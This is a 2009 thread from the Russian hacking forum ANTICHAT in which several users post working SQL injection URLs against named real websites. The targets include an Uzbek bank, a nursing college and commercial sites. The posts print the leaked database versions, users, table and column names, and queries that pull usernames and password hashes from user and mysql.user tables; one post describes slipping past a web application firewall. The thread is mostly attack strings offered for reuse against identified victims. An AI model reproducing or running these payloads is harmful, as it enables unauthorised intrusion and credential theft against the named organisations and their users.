ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11321  
Старый 12.12.2009, 03:47
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Код:
http://www.lunapack.com.ua/news.php?id=56+and+1=0+Union%20Select%20%201,2,3,version%28%29%20,5
Version = 5.0.88-log
Database = serkin_lunapack
User = serkin_lunapack@first.hosted.in

Код:
http://miniaturebottles.com/MMBC_guestbook/view.php?id=511+and+1=0+Union%20Select%20%201,UNHEX%28HEX%28version%28%29%29%29%20,3,4,5,6,7
Version = 4.1.25-log
User = a0008864@69.12.112.22
Database = a0008864-2
Tablesassword, contacts
Columns: Table password:username ,id, userpass

Последний раз редактировалось TELO; 12.12.2009 в 04:41..
 
Ответить с цитированием

  #11322  
Старый 12.12.2009, 06:09
GrAmOzEkA
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669

Репутация: 178
По умолчанию

Галлабанк
Цитата:
http://qishloqqurilishbank.uz/ru/index.php
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,database%28%29,3,4,5,6,7,8,9,10--
qqb

Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema=0x717162--
branch 0x6272616E6368
deposit 0x6465706F736974
exchange
m_transfer
minibank 0x6D696E6962616E6B
news
presssa
s_office 0x735F6F6666696365
valuta

Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x735F6F6666696365--
id
branch_id
so_adres
language
date_rec

Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6272616E6368--
id
branch_mfo
branch_name
phone_num
address
language
date_rec
per_n
tr
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6D696E6962616E6B--
id
branch_id
mb_name
mb_adres
language
date_rec
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-11+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema=0x717162+AND+table_name=0x6465706F736974--
id
type_currency
name_deposit
type_deposit
period,percent
first_deposit
general_conditions
activ
language
cur_date
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(id,0x3A,type_currency,0x3A,name_deposit,0x3A,type_deposit,0x3A,period,0x3A,percent,0x3A,first_deposit,0x3A,general_conditions,0x3A,activ,0x3A,language,0x3A,cur_date,0x3A),3,4,5,6,7,8,9,10+FROM+qqb.deposit--
Код:
http://qishloqqurilishbank.uz/uz/news.php?page=8&id=-1+UNION+SELECT+1,group_concat(user,0x3A,password),3,4,5,6,7,8,9,10++FROM+mysql.user--

Последний раз редактировалось jokester; 12.12.2009 в 11:22.. Причина: пароли
 
Ответить с цитированием

  #11323  
Старый 13.12.2009, 17:19
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

designerpreviews.com PR-3

Данные передаем постом, ибо стоит злобный WAF

Код:
http://www.designerpreviews.com/index.php?sec=-4/**/union/**/select/**/1,2,3,4,5,6,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,8,9,10+--+
Код:
5.0.81-community:designer_briank@localhost:designer_db
ottosshrunkenhead.com PR-4

Также инъектим постом

Код:
http://www.ottosshrunkenhead.com/php/eventsdbm.php?event_id=-1+union+select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,2,3,4,5,6,7,8+--+&cmd=edit&type=1
Код:
5.0.81-community:ottosshr_otto@localhost:ottosshr_odb
equinesavior.com PR-3

POST

Код:
http://equinesavior.com/phpclassifieds/index.php?catid=7+UnIon+SeLeCt+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17+--+&catname=General%20Merchandise
Код:
 5.0.81-community:equinesa_owner@localhost:equinesa_phpclass
 
Ответить с цитированием

  #11324  
Старый 13.12.2009, 18:07
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://lancia.ro/noutati.php?id=-38+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9


Database version: 5.0.85-community
Database name: lancia2_content2
Database user: lancia2_admcon@localhost
Os: pc-linux-gnu
 
Ответить с цитированием

  #11325  
Старый 13.12.2009, 23:30
fox_malder
Участник форума
Регистрация: 28.11.2008
Сообщений: 281
Провел на форуме:
3193846

Репутация: 242
По умолчанию

http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+s elect+1,2,concat_ws(0x3a,version(),database(),user (),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57
5.0.22
monterra
root@localhost
redhat-linux-gnu

http://www.monterra.ro/index.php?module=vanzare&tip=3&id=50+and+0+union+s elect+1,2,id,4,5,email,password,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57+from+users
 
Ответить с цитированием

  #11326  
Старый 14.12.2009, 02:06
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Код:
http://www.aeria.ma/news.php?id=-1+union+select+1,concat_ws%28user%28%29,version%28%29,database%28%29,@@version_compile_os%29--
user:aeria@209.62.86.68:
version:5.0.84-percona-highperf-b18-log:
database:aeria:
OS:unknown-linux-gnu
Код:
http://www.businessexperts.ma/businessexperts/details-news.php?id=-8+union+select+1,2,3,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,5,6,7,8,9--
user:ahmani@localhost:
version:5.0.45:
database:businessexperts:
OS:redhat-linux-gnu.
Код:
http://www.alexnursing.edu.eg/news.php?id=-14+union+select+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,3,4,5--
user:alexnurs_nw@localhost:
version:5.0.85-community:
database:alexnurs_ndb:
OSc-linux-gnu
 
Ответить с цитированием

  #11327  
Старый 14.12.2009, 08:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://www.pscs.ru/index.php?link=1&id=-86+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3+--+
User: pscsru_pscs@localhost
Database: pscsru_pscs
Version: 5.0.67-community
 
Ответить с цитированием

  #11328  
Старый 14.12.2009, 09:42
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Код:
http://la2-shop.ru/categories.php?id_cat=-13'+union+select+concat_ws(0x3a,version(),database(),user())+--+
4.1.22-log:tok_center_la2:tok-center_mysql@10.1.31.126
Код:
http://www.nazgulowen.com/blog.php?id=-12+union+select+concat_ws(0x3a,id,nick,name,password)+from+users/*
вывод в мета контенте
Код:
http://www.vero-software.com/news_detail.php?id=999999999+union+select+1,2,concat_ws(0x3a,user,password),4,5,6+from+mysql.user--

Последний раз редактировалось jokester; 14.12.2009 в 14:55.. Причина: хеш
 
Ответить с цитированием

  #11329  
Старый 17.12.2009, 20:26
n1ck
Новичок
Регистрация: 06.09.2007
Сообщений: 8
Провел на форуме:
63181

Репутация: 4
Отправить сообщение для n1ck с помощью ICQ
По умолчанию

http://www.section404.org/news.php?id=-1%20union%20select%201,2,3,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,5,6--
 
Ответить с цитированием

  #11330  
Старый 18.12.2009, 01:04
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

de.varesehotels.it

Код:
http://de.varesehotels.it/territorio/145-beata-vergine-dei-miracoli.php?km=50+union+select

+1,2,3,concat_ws%280x3a,version%28%29,user%28%29,database

%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36

,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62+--+
Код:
5.0.51a-24+lenny1:varetels_db@localhost:varetels_db
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
 


Быстрый переход




ANTICHAT.XYZ